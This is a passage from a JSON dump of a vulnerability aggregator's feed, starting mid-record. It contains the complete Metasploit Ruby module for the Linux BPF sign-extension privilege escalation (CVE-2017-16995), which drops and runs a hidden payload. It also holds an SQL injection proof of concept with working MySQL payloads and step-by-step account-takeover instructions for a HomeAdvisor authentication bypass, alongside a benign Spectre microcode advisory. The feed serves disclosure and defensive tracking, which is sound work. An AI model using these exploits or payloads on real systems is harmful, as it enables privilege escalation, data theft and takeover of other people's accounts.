[ 'BID', '102288' ],\r\n [ 'CVE', '2017-16995' ],\r\n [ 'EDB', '44298' ],\r\n [ 'EDB', '45010' ],\r\n [ 'URL', 'https://github.com/rlarabee/exploits/blob/master/cve-2017-16995/cve-2017-16995.c' ],\r\n [ 'URL', 'https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c' ],\r\n [ 'URL', 'http://cyseclabs.com/pub/upstream44.c' ],\r\n [ 'URL', 'https://blog.aquasec.com/ebpf-vulnerability-cve-2017-16995-when-the-doorman-becomes-the-backdoor' ],\r\n [ 'URL', 'https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html' ],\r\n [ 'URL', 'https://www.debian.org/security/2017/dsa-4073' ],\r\n [ 'URL', 'https://usn.ubuntu.com/3523-2/' ],\r\n [ 'URL', 'https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-16995.html' ],\r\n [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1454' ],\r\n [ 'URL', 'http://openwall.com/lists/oss-security/2017/12/21/2'],\r\n [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=95a762e2c8c942780948091f8f2a4f32fce1ac6f' ]\r\n ],\r\n 'DefaultTarget' => 0))\r\n register_options [\r\n OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w[Auto True False] ]),\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\r\n ]\r\n end\r\n\r\n def base_dir\r\n datastore['WritableDir'].to_s\r\n end\r\n\r\n def upload(path, data)\r\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\r\n rm_f path\r\n write_file path, data\r\n end\r\n\r\n def upload_and_chmodx(path, data)\r\n upload path, data\r\n cmd_exec \"chmod +x '#{path}'\"\r\n end\r\n\r\n def upload_and_compile(path, data)\r\n upload \"#{path}.c\", data\r\n\r\n gcc_cmd = \"gcc -o #{path} #{path}.c\"\r\n if session.type.eql? 'shell'\r\n gcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\"\r\n end\r\n output = cmd_exec gcc_cmd\r\n rm_f \"#{path}.c\"\r\n\r\n unless output.blank?\r\n print_error output\r\n fail_with Failure::Unknown, \"#{path}.c failed to compile. Set COMPILE False to upload a pre-compiled executable.\"\r\n end\r\n\r\n cmd_exec \"chmod +x #{path}\"\r\n end\r\n\r\n def exploit_data(file)\r\n path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2017-16995', file\r\n fd = ::File.open path, 'rb'\r\n data = fd.read fd.stat.size\r\n fd.close\r\n data\r\n end\r\n\r\n def live_compile?\r\n return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')\r\n\r\n if has_gcc?\r\n vprint_good 'gcc is installed'\r\n return true\r\n end\r\n\r\n unless datastore['COMPILE'].eql? 'Auto'\r\n fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'\r\n end\r\n end\r\n\r\n def check\r\n arch = kernel_hardware\r\n unless arch.include? 'x86_64'\r\n vprint_error \"System architecture #{arch} is not supported\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"System architecture #{arch} is supported\"\r\n\r\n if unprivileged_bpf_disabled?\r\n vprint_error 'Unprivileged BPF loading is not permitted'\r\n return CheckCode::Safe\r\n end\r\n vprint_good 'Unprivileged BPF loading is permitted'\r\n\r\n release = kernel_release\r\n if Gem::Version.new(release.split('-').first) > Gem::Version.new('4.14.11') ||\r\n Gem::Version.new(release.split('-').first) < Gem::Version.new('4.0')\r\n vprint_error \"Kernel version #{release} is not vulnerable\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"Kernel version #{release} appears to be vulnerable\"\r\n\r\n CheckCode::Appears\r\n end\r\n\r\n def exploit\r\n unless check == CheckCode::Appears\r\n fail_with Failure::NotVulnerable, 'Target not vulnerable! punt!'\r\n end\r\n\r\n if is_root?\r\n fail_with Failure::BadConfig, 'Session already has root privileges'\r\n end\r\n\r\n unless cmd_exec(\"test -w '#{base_dir}' && echo true\").include? 'true'\r\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\r\n end\r\n\r\n # Upload exploit executable\r\n executable_name = \".#{rand_text_alphanumeric rand(5..10)}\"\r\n executable_path = \"#{base_dir}/#{executable_name}\"\r\n if live_compile?\r\n vprint_status 'Live compiling exploit on system...'\r\n upload_and_compile executable_path, exploit_data('exploit.c')\r\n else\r\n vprint_status 'Dropping pre-compiled exploit on system...'\r\n upload_and_chmodx executable_path, exploit_data('exploit.out')\r\n end\r\n\r\n # Upload payload executable\r\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}\"\r\n upload_and_chmodx payload_path, generate_payload_exe\r\n\r\n # Launch exploit\r\n print_status 'Launching exploit ...'\r\n output = cmd_exec \"echo '#{payload_path} & exit' | #{executable_path} \"\r\n output.each_line { |line| vprint_status line.chomp }\r\n print_status \"Cleaning up #{payload_path} and #{executable_path} ...\"\r\n rm_f executable_path\r\n rm_f payload_path\r\n end\r\nend", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/45058/"}], "packetstorm": [{"lastseen": "2018-07-19T09:36:07", "references": [], "description": "", "edition": 1, "reporter": "h00die", "published": "2018-07-19T00:00:00", "title": "Linux BPF Sign Extension Local Privilege Escalation", "type": "packetstorm", "enchantments": {"score": {"modified": "2018-07-19T09:36:07", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-16995"], "modified": "2018-07-19T00:00:00", "id": "PACKETSTORM:148607", "href": "https://packetstormsecurity.com/files/148607/Linux-BPF-Sign-Extension-Local-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = GreatRanking \n \ninclude Msf::Post::Linux::Priv \ninclude Msf::Post::Linux::System \ninclude Msf::Post::Linux::Kernel \ninclude Msf::Post::File \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Linux BPF Sign Extension Local Privilege Escalation', \n'Description' => %q{ \nLinux kernel prior to 4.14.8 utilizes the Berkeley Packet Filter (BPF) \nwhich contains a vulnerability where it may improperly perform sign \nextension. This can be utilized to escalate privileges. \n \nThe target system must be compiled with BPF support and must not have \nkernel.unprivileged_bpf_disabled set to 1. \n \nThis module has been tested successfully on: \n \nDebian 9.0 kernel 4.9.0-3-amd64; \nDeepin 15.5 kernel 4.9.0-deepin13-amd64; \nElementaryOS 0.4.1 kernel 4.8.0-52-generic; \nFedora 25 kernel 4.8.6-300.fc25.x86_64; \nFedora 26 kernel 4.11.8-300.fc26.x86_64; \nFedora 27 kernel 4.13.9-300.fc27.x86_64; \nGentoo 2.2 kernel 4.5.2-aufs-r; \nLinux Mint 17.3 kernel 4.4.0-89-generic; \nLinux Mint 18.0 kernel 4.8.0-58-generic; \nLinux Mint 18.3 kernel 4.13.0-16-generic; \nMageia 6 kernel 4.9.35-desktop-1.mga6; \nManjero 16.10 kernel 4.4.28-2-MANJARO; \nSolus 3 kernel 4.12.7-11.current; \nUbuntu 14.04.1 kernel 4.4.0-89-generic; \nUbuntu 16.04.2 kernel 4.8.0-45-generic; \nUbuntu 16.04.3 kernel 4.10.0-28-generic; \nUbuntu 17.04 kernel 4.10.0-19-generic; \nZorinOS 12.1 kernel 4.8.0-39-generic. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Jann Horn', # Discovery \n'bleidl', # Discovery and get-rekt-linux-hardened.c exploit \n'vnik', # upstream44.c exploit \n'rlarabee', # cve-2017-16995.c exploit \n'h00die', # Metasploit \n'bcoles' # Metasploit \n], \n'DisclosureDate' => 'Nov 12 2017', \n'Platform' => [ 'linux' ], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'SessionTypes' => [ 'shell', 'meterpreter' ], \n'Targets' => [[ 'Auto', {} ]], \n'Privileged' => true, \n'References' => \n[ \n[ 'AKA', 'get-rekt-linux-hardened.c' ], \n[ 'AKA', 'upstream44.c' ], \n[ 'BID', '102288' ], \n[ 'CVE', '2017-16995' ], \n[ 'EDB', '44298' ], \n[ 'EDB', '45010' ], \n[ 'URL', 'https://github.com/rlarabee/exploits/blob/master/cve-2017-16995/cve-2017-16995.c' ], \n[ 'URL', 'https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c' ], \n[ 'URL', 'http://cyseclabs.com/pub/upstream44.c' ], \n[ 'URL', 'https://blog.aquasec.com/ebpf-vulnerability-cve-2017-16995-when-the-doorman-becomes-the-backdoor' ], \n[ 'URL', 'https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html' ], \n[ 'URL', 'https://www.debian.org/security/2017/dsa-4073' ], \n[ 'URL', 'https://usn.ubuntu.com/3523-2/' ], \n[ 'URL', 'https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-16995.html' ], \n[ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1454' ], \n[ 'URL', 'http://openwall.com/lists/oss-security/2017/12/21/2'], \n[ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=95a762e2c8c942780948091f8f2a4f32fce1ac6f' ] \n], \n'DefaultTarget' => 0)) \nregister_options [ \nOptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w[Auto True False] ]), \nOptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) \n] \nend \n \ndef base_dir \ndatastore['WritableDir'].to_s \nend \n \ndef upload(path, data) \nprint_status \"Writing '#{path}' (#{data.size} bytes) ...\" \nrm_f path \nwrite_file path, data \nend \n \ndef upload_and_chmodx(path, data) \nupload path, data \ncmd_exec \"chmod +x '#{path}'\" \nend \n \ndef upload_and_compile(path, data) \nupload \"#{path}.c\", data \n \ngcc_cmd = \"gcc -o #{path} #{path}.c\" \nif session.type.eql? 'shell' \ngcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\" \nend \noutput = cmd_exec gcc_cmd \nrm_f \"#{path}.c\" \n \nunless output.blank? \nprint_error output \nfail_with Failure::Unknown, \"#{path}.c failed to compile. Set COMPILE False to upload a pre-compiled executable.\" \nend \n \ncmd_exec \"chmod +x #{path}\" \nend \n \ndef exploit_data(file) \npath = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2017-16995', file \nfd = ::File.open path, 'rb' \ndata = fd.read fd.stat.size \nfd.close \ndata \nend \n \ndef live_compile? \nreturn false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True') \n \nif has_gcc? \nvprint_good 'gcc is installed' \nreturn true \nend \n \nunless datastore['COMPILE'].eql? 'Auto' \nfail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.' \nend \nend \n \ndef check \narch = kernel_hardware \nunless arch.include? 'x86_64' \nvprint_error \"System architecture #{arch} is not supported\" \nreturn CheckCode::Safe \nend \nvprint_good \"System architecture #{arch} is supported\" \n \nif unprivileged_bpf_disabled? \nvprint_error 'Unprivileged BPF loading is not permitted' \nreturn CheckCode::Safe \nend \nvprint_good 'Unprivileged BPF loading is permitted' \n \nrelease = kernel_release \nif Gem::Version.new(release.split('-').first) > Gem::Version.new('4.14.11') || \nGem::Version.new(release.split('-').first) < Gem::Version.new('4.0') \nvprint_error \"Kernel version #{release} is not vulnerable\" \nreturn CheckCode::Safe \nend \nvprint_good \"Kernel version #{release} appears to be vulnerable\" \n \nCheckCode::Appears \nend \n \ndef exploit \nunless check == CheckCode::Appears \nfail_with Failure::NotVulnerable, 'Target not vulnerable! punt!' \nend \n \nif is_root? \nfail_with Failure::BadConfig, 'Session already has root privileges' \nend \n \nunless cmd_exec(\"test -w '#{base_dir}' && echo true\").include? 'true' \nfail_with Failure::BadConfig, \"#{base_dir} is not writable\" \nend \n \n# Upload exploit executable \nexecutable_name = \".#{rand_text_alphanumeric rand(5..10)}\" \nexecutable_path = \"#{base_dir}/#{executable_name}\" \nif live_compile? \nvprint_status 'Live compiling exploit on system...' \nupload_and_compile executable_path, exploit_data('exploit.c') \nelse \nvprint_status 'Dropping pre-compiled exploit on system...' \nupload_and_chmodx executable_path, exploit_data('exploit.out') \nend \n \n# Upload payload executable \npayload_path = \"#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}\" \nupload_and_chmodx payload_path, generate_payload_exe \n \n# Launch exploit \nprint_status 'Launching exploit ...' \noutput = cmd_exec \"echo '#{payload_path} & exit' | #{executable_path} \" \noutput.each_line { |line| vprint_status line.chomp } \nprint_status \"Cleaning up #{payload_path} and #{executable_path} ...\" \nrm_f executable_path \nrm_f payload_path \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/148607/bpf_sign_extension_priv_esc.rb.txt"}, {"lastseen": "2018-07-19T09:36:07", "references": [], "description": "", "edition": 1, "reporter": "Ozkan Mustafa Akkus", "published": "2018-07-18T00:00:00", "title": "Smart SMS And Email Manager 3.3 SQL Injection", "type": "packetstorm", "enchantments": {"score": {"modified": "2018-07-19T09:36:07", "vector": "NONE", "value": 6.8}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-07-18T00:00:00", "id": "PACKETSTORM:148600", "href": "https://packetstormsecurity.com/files/148600/Smart-SMS-And-Email-Manager-3.3-SQL-Injection.html", "sourceData": "`# Exploit Title: Smart SMS & Email Manager v3.3 - SQL Injection \n# Google Dork: N/A \n# Date: 17.07.2018 \n# Exploit Author: Azkan Mustafa AkkuA (AkkuS) \n# Vendor Homepage: https://codecanyon.net/item/smart-sms-email-manager-ssem/14817919 \n# Version: 3.3 \n# Tested on: Kali linux \n==================================================== \nThe vulnerability allows an attacker to inject sql commands \nfrom the search section with 'contact_type_id' parameter in the admin panel. \n \n \n# PoC : SQLi : \n \nhttp://site.net/phonebook/contact_list_data \n \nPOST /phonebook/contact_list_data HTTP/1.1 \nHost: site.net \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 \nFirefox/52.0 \nAccept: application/json, text/javascript, */*; q=0.01 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: http://site.net/phonebook/contact_list \nContent-Type: application/x-www-form-urlencoded; charset=UTF-8 \nX-Requested-With: XMLHttpRequest \nContent-Length: 141 \nCookie: \nci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22d61b9083afe2435321ba518449f3b108%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22213.14.165.138%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A52.0%29+Gecko%2F20100101+Firefox%2F52.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1531824069%3B%7Dce4c26e8ee366999ae805f61eba75b1a; \nxerone_dolphin=6811071531824070937 \nConnection: keep-alive \nfirst_name=Test&last_name=test&phone_number=5555555&email=test%40test.com \n&dob=07%2F04%2F2018&contact_type_id=280&is_searched=1&page=1&rows=10 \n \n \nParameter: contact_type_id (POST) \nType: boolean-based blind \nTitle: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or \nGROUP BY clause \nPayload: client_username=tes&contact_type_id=142' RLIKE (SELECT (CASE \nWHEN (5715=5715) THEN 142 ELSE 0x28 END)) AND 'Jeop' LIKE \n'Jeop&permission_search=1&search_page=217722575636101&is_searched=1&page=1&rows=20 \n \nType: error-based \nTitle: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP \nBY clause (EXTRACTVALUE) \nPayload: client_username=tes&contact_type_id=142' AND \nEXTRACTVALUE(4506,CONCAT(0x5c,0x7176716271,(SELECT \n(ELT(4506=4506,1))),0x7171707071)) AND 'vZFG' LIKE \n'vZFG&permission_search=1&search_page=217722575636101&is_searched=1&page=1&rows=20 \n \n==================================================== \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/148600/smartsmsemailmanager-sql.txt"}], "cloudfoundry": [{"lastseen": "2018-07-20T02:01:28", "references": [], "description": "# \n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n\n# Description\n\nUSN-3690-1 provided updated microcode for AMD processors to address CVE-2017-5715 (aka Spectre). Unfortunately, the update caused some systems to fail to boot. This update reverts the update for Ubuntu 14.04 LTS.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nJann Horn discovered that microprocessors utilizing speculative execution and branch prediction may allow unauthorized memory reads via sidechannel attacks. This flaw is known as Spectre. A local attacker could use this to expose sensitive information, including kernel memory.\n\nThis update provides the microcode updates for AMD 17H family processors required for the corresponding Linux kernel updates.\n\n# Affected Cloud Foundry Products and Versions\n\n * Cloud Foundry BOSH stemcells are vulnerable, including: \n * 3363.x versions prior to 3363.68\n * 3421.x versions prior to 3421.69\n * 3445.x versions prior to 3445.54\n * 3468.x versions prior to 3468.54\n * 3541.x versions prior to 3541.36\n * 3586.x versions prior to 3586.26\n * All other stemcells not listed.\n\n# Mitigation\n\nOSS users are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH stemcells: \n * Upgrade 3363.x versions to 3363.68\n * Upgrade 3421.x versions to 3421.69\n * Upgrade 3445.x versions to 3445.54\n * Upgrade 3468.x versions to 3468.54\n * Upgrade 3541.x versions to 3541.36\n * Upgrade 3586.x versions to 3586.26\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io>).\n\n# References\n\n * [USN-3690-2](<https://usn.ubuntu.com/3690-2/>)\n", "edition": 1, "reporter": "Cloud Foundry", "published": "2018-07-19T00:00:00", "title": "USN-3690-2: AMD Microcode regression - Cloud Foundry", "type": "cloudfoundry", "enchantments": {"score": {"modified": "2018-07-20T02:01:28", "vector": "NONE", "value": 2.1}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2017-5715"], "modified": "2018-07-19T00:00:00", "id": "CFOUNDRY:F862BE9A087FA6B59D4299BADF8089DC", "href": "https://www.cloudfoundry.org/blog/usn-3690-2/", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}], "vulnerlab": [{"lastseen": "2018-07-19T11:35:04", "references": [], "description": "", "edition": 1, "reporter": "Vulnerability-Lab [research@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab", "published": "2018-07-19T00:00:00", "title": "HomeAdvisor Pro - EntityHash Auth Bypass Vulnerability", "type": "vulnerlab", "enchantments": {"score": {"modified": "2018-07-19T11:35:04", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-07-19T00:00:00", "id": "VULNERLAB:1557", "href": "http://www.vulnerability-lab.com/get_content.php?id=1557", "sourceData": "Document Title:\r\n===============\r\nHomeAdvisor Pro - EntityHash Auth Bypass Vulnerability\r\n\r\n\r\nReferences (Source):\r\n====================\r\nhttp://www.vulnerability-lab.com/get_content.php?id=1557\r\n\r\nVideo: https://www.vulnerability-lab.com/get_content.php?id=1929\r\n\r\n\r\nRelease Date:\r\n=============\r\n2018-07-19\r\n\r\n\r\nVulnerability Laboratory ID (VL-ID):\r\n====================================\r\n1557\r\n\r\n\r\nCommon Vulnerability Scoring System:\r\n====================================\r\n9.6\r\n\r\n\r\nVulnerability Class:\r\n====================\r\nAuthentication Bypass\r\n\r\n\r\nCurrent Estimated Price:\r\n========================\r\n5.000\u20ac - 10.000\u20ac\r\n\r\n\r\nProduct & Service Introduction:\r\n===============================\r\nOver 30 million homeowners have trusted HomeAdvisor to help them find quality pros with the expertise to turn their home improvement \r\ndreams into reality. It's just one of the reasons you can depend on us to bring you highly targeted prospects that will grow \r\nyour business. Getting started is easy. Sign up today and let us help you grow your business, one homeowner at a time.\r\n\r\n(Copy of the Vendor Homepage: https://pro.homeadvisor.com/how-it-works/ )\r\n\r\n\r\nAbstract Advisory Information:\r\n==============================\r\nThe vulnerability laboratory core research team discovered an auth bypass session vulnerability in the official HomeAdvisor online service web-application.\r\n\r\n\r\nVulnerability Disclosure Timeline:\r\n==================================\r\n2018-07-19: Public Disclosure (Vulnerability Laboratory)\r\n\r\n\r\nDiscovery Status:\r\n=================\r\nPublished\r\n\r\n\r\nExploitation Technique:\r\n=======================\r\nRemote\r\n\r\n\r\nSeverity Level:\r\n===============\r\nCritical\r\n\r\n\r\nAuthentication Type:\r\n====================\r\nPre auth - no privileges\r\n\r\n\r\nUser Interaction:\r\n=================\r\nNo User Interaction\r\n\r\n\r\nDisclosure Type:\r\n================\r\nBug Bounty Program\r\n\r\n\r\nTechnical Details & Description:\r\n================================\r\nA entityHash auth bypass session vulnerability has been discovered in the official HomeAdvisor Pro online service web-application.\r\nThe auth bypass session vulnerability allows remote attackers to gain access to another user secure profile information and data.\r\n\r\nThe vulnerability is located in the entityHash= parameter of homeadvisory pro. When an attacker changes the value entityHash= to \r\nthe victim entityHash= you will login without confirm secure. By usage of google or other crawlers we are able to capture the \r\nentityHash value of homeadvisor pro users. The same vulnerability typus was disclosed first by our team to the microsoft bug \r\nbounty yammer program in 2013. The vulnerability is that there is no second auth approval for the entityhash which can results \r\nin a takeover of another account by usage of an auth bypass in connection with the hash. The hash is not secure approved and \r\nthus results in an auth bypass by usage of the entityhash only. Another trick to bypass is that the attacker uses the user id \r\nthat is attached to the request next to the entityhash.\r\n\r\nThe security risk of the auth bypass vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 9.6.\r\nExploitation of the critical auth bypass web vulnerability requires no privileged web-application user account or user interaction.\r\nSuccessful exploitation of the vulnerabilities results in user account and accountsystem compromise by manipulation or infiltration.\r\n\r\nVulnerable Parameter(s):\r\n[+] entityHash\r\n\r\n\r\nProof of Concept (PoC):\r\n=======================\r\nThe vulnerability can be exploited by remote attackers without privileged web-application user account or user interaction.\r\nFor security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.\r\n\r\n\r\nManual steps to reproduce the vulnerability ...\r\n1. Open https://pro.homeadvisor.com\r\n2. Do search in google site:pro.homeadvisor.com/ entityHash=\r\n3. Farm some entityHash values of clients\r\n3. Change the entityHash= to the entityHash= of a random victim by intercepting the traffic or via http live tamper\r\n4. Perform the request via GET method to the homeadvisor service application\r\nNow, you will logged in with a valid session and the victims entityHash value\r\nNote: When you change via tamper the value entityHash of the victim you will login with just change the value entityHash=\r\n\r\n\r\n--- PoC Session Logs ---\r\nStatus: 301[Moved Permanently]\r\nGET https://pro.homeadvisor.com/servlet/HomeServlet?entityHash=11928834_396bc39710bdad7504a4807feeef1817\r\nMime Type[application/x-unknown-content-type]\r\n Request Headers:\r\n Host[pro.homeadvisor.com]\r\n User-Agent[Mozilla/5.0 (X11; Linux i686; rv:39.0) Gecko/20100101 Firefox/39.0]\r\n Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]\r\n Cookie[originatingSessionID=\"1337\"; csacn=746971; csdcn=1437478941849; psacn=746971; psdcn=1437478121418; \r\noptimizelyEndUserId=oeu1429704431469r0.8701083976370677; v71=%5B%5B%27Referrers%27%2C%271437473444057%27%5D%2C%5B%27Type-In%27%2C%271437473599713%27%5D%2C%5B%27\r\nReferrers%27%2C%271437476175935%27%5D%2C%5B%27Type-In%27%2C%271437476183081%27%5D%2C%5B%27Email%27%2C%271437476340853%27%5D%2C%5B%27Type-In%27%2C%27143747649728\r\n9%27%5D%2C%5B%27Email%27%2C%271437477034239%27%5D%2C%5B%27Type-In%27%2C%271437477132544%27%5D%2C%5B%27Referrers%27%2C%271437477971178%27%5D%2C%5B%27Type-In%27%2\r\nC%271437478182352%27%5D%5D; fsr.r=%7B%22d%22%3A90%2C%22i%22%3A%22d5e2305-49433661-607d-7166-b4aa3%22%2C%22e%22%3A1430309540199%7D; s_fid=26A640D6D01EEF1E-27AB9\r\n4756408D960; s_dslv2=1437478802329; optimizelySegments=%7B%22192702441%22%3A%22ff%22%2C%22192663147%22%3A%22false%22%2C%22192690192%22%3A%22none%22%2C%22192644\r\n497%22%3A%22referral%22%2C%223034470465%22%3A%22true%22%2C%223018270184%22%3A%22true%22%2C%223013960429%22%3A%22true%22%2C%222403180023%22%3A%22true%22%7D; opti\r\nmizelyBuckets=%7B%222994180103%22%3A%222999960067%22%2C%223126860572%22%3A%223123860510%22%7D; __utma=65920055.2074902274.1429704432.1437473373.1437477940.6; __\r\nutmz=65920055.1429704432.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); s_vi=[CS]v1|2A9BC79185011597-600001136000151A[CE]; s_gnr=1437\r\n478802331-Repeat; s_vnum=1438383600051%26vn%3D3; _ivu=A3BF18A6-D7AF-4BDE-834F-C3FD2FDD2C99; __gads=ID=fe1944bfab77b958:T=1435889440:S=ALNI_MbHVWIV_urncurn-m_oEuak\r\nLS1g9A; __utma=168469472.339370364.1435889637.1437473444.1437476340.5; __utmz=168469472.1437476340.5.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%2\r\n0provided); __ar_v4=OBIU2LI5ZFELBJFDGHFF5S%3A20150702%3A167%7C4SFWD66ESVAFDCGDKRX43R%3A20150702%3A167%7C2LYJLG4RLJCKZCOW7TRWTE%3A20150702%3A167%7CGYZQKVMPWJBZBP4OC\r\nB6CM4%3A20150720%3A193%7CIUECRTQC6ZC77PLZBQQ6ZP%3A20150720%3A193%7CKCYCVZHJ7FAAZBDQKGHHAY%3A20150720%3A193; _gig_llp=facebook; _gig_llu=Samir; __qca=P0-1342044628-1\r\n435894942731; v72=%5B%5B%27EM-15727939%27%2C%2\r\n71435895145385%27%5D%2C%5B%27EM-15727939%27%2C%271435895596636%27%5D%2C%5B%27EM-15727939%27%2C%271437476340855%27%5D%2C%5B%27EM-15727939%27%2C%271437477034240%27%5\r\nD%5D; sess_log=1437478121418pwspr00841515EDC235E3F21DAE93527415D3E01; TS01a79be6=0109d29b8d01d791112555e8647b1ccf4bc0fa66ab89aa52622d0c4d77fcf08ea60e991c70e7cd768d1351\r\neeb37e5b4e0e9d4e8db7697a4b735723fbc02bd2224254679ec3748a5ffa6ee81654a\r\n4445e9e46eed3ba316d22a832511a443958e63a0e84c217af9bde02e5ff2f0015161c4730fbdfb120ed37c0069f4e8e3b58a346499bb5ce; s_cc=true; s_eVar8=unknown; fpv=1; \r\nc_m=undefinedType-InType-In; s_e69=Type-In; s_evar46=5%3A30AM; s_evar47=Tuesday; s_evar48=Weekday; s_dslv2_s=More%20than%207%20days; s_gnr2=Repeat; s_invisit=true; \r\ns_visNum=3; s_ppv=31; v11=41.104.137.97; s_sq=%5B%5BB%5D%5D; fsr.s=%7B%22cp%22%3A%7B%22zipCode%22%3A%22%22%2C%22ActionName%22%3A%22%20\r\nSpanish_Checkbox_32226_0113_spanchk%22%2C%22loggedIn%22%3A%22false%22%2C%22entryPage%22%3A%22%2FWEB-INF%2Fjsp%2Fsp%2Ferrorpages%2Ferror.jsp%22%2C%22sessionID%22%3A\r\n%221437476975551pwspr050.homeadvisor.comC7A8DB62858CB2098E29BF24C48C092B.pwspr050-1%22%2C%22userID%22%3A%2211928834%22%2C%22affiliateID%22%3A%223843876%22%2C%22\r\ncategoryID%22%3A%220%22%2C%22SP%20Type%22%3A%22ProFinder%22%7D%2C%22v1%22%3A-2%2C%22v2%22%3A-2%2C%22rid%22%3A%22d5e2305-49374835-08a4-4b0c-b969e%22%2C%22to%22%3\r\nA4.7%2C%22c%22%3A%22https%3A%2F%2Fpro.homeadvisor.com%2F%22%2C%22pv%22%3A100%2C%22lc%22%3A%7B%22d1%22%3A%7B%22v%22%3A6%2C%22s%22%3Atrue%7D%2C%22d0%22%3A%7B%22v%22\r\n%3A80%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22f%22%3A1437478801866%2C%22sd%22%3A0%7D; __utmc=65920055; s_e17=event17; s_eVar55=11928834; s_spid=24662366; \r\nJSESSIONID=C7A8DB62858CB2098E29BF24C48C092B.pwspr050-1; aff_track=2|*|3843876|*|15727939; ServerID=503949504.20480.0000; TS014cf8c3=0109d29b8d523dbe082e522b290c477faaf9f27c2227b5a2d61bc9d1c4cf3585484177c0a2c1c1f1c8aec540b56ba70f0bff7c262464155a8619369b41c16001e8ea4934a70f9e98c52fea\r\na9056483832d5f64b768ba67c975bf71b8341d169a6e56a17d1aefaa18e4d99dfebe5143ddd7da16b5f48724d8ed0db03fd8a3d3d0936874e99316d598672952421e80372b1915bc2b9360524bbc178c584fb3981fba3262b50f; TS01a764fb=0109d29b8dfd5e5e7e4e41488c4639209211ebb0972c67fcc7542e553b2d46e07bb44971d154da4d10911ffda6566d508608c1223eefb105abbda02c6e5d5e38a49199ccf90c0dfb5abcdba0e\r\nfa9b7246056f9ef59910ed8e57daa343c56497e2edfa46317fc1b82171e1fa666d4b4c5d18fe0daf57dfb7e0910e8371b3babc0612e9b3acc; __utmb=168469472.45.10.1437476340; \r\n__utmc=168469472; ctqc=0; __utmb=65920055.1.10.1437477940; __utmt=1]\r\n X-Forwarded-For[8.8.8.8]\r\n Connection[keep-alive]\r\n Response Headers:\r\n Location[https://pro.homeadvisor.com/]\r\n Connection[Keep-Alive]\r\n 